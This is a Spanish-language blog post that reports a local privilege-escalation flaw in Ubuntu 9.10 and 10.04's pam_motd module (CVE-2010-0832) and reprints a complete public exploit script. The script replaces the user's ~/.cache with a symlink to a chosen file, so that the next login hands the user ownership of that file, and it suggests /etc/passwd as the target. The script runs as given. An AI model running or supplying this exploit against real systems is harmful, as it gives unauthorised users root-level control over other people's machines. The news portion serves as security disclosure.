Los desarrolladores de UBUNTU corrigieron esta semana un problema de seguridad que daba a los atacantes privilegios de administrador. La vulnerabilidad presente en el módulo pam_motd permitía no solo leer contraseñas sino también modificarlas. Esto se produce en UBUNTU 9.10 y 10.04

No se trata de algo que afecte a todos los usuarios ya que no es parte de la instalación por defecto. (se trata de una aplicación que muestra diariamente un mensaje ni bien el usuario ingresa al sistema). Sin embargo quienes hayan instalado update-motd deben actualizar urgentemente ya que por la red está disponible las indicaciones para aprovechar la vulnerabilidad.

Según los desarrolladores ni GEBIAN ni otras distribuciones derivadas de ella están afectadas.

FUENTE

 

Ya se ha publicado el exploit

 

#!/bin/sh

#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen <[email protected]>
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)
# CVE : CVE-2010-0832
#
# Notes: Affects Ubuntu 9.10 and 10.04 LTS
# [Patch Instructions]
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i
#
if [ $# -eq 0 ]; then
echo "Usage: $0 /path/to/file"
exit 1
fi
mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache

echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code 🙂  File will then be owned by your user.  Try /etc/passwd...\n"

 

Via:

Por admin

Deja una respuesta

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.

Powered By
100% Free SEO Tools - Tool Kits PRO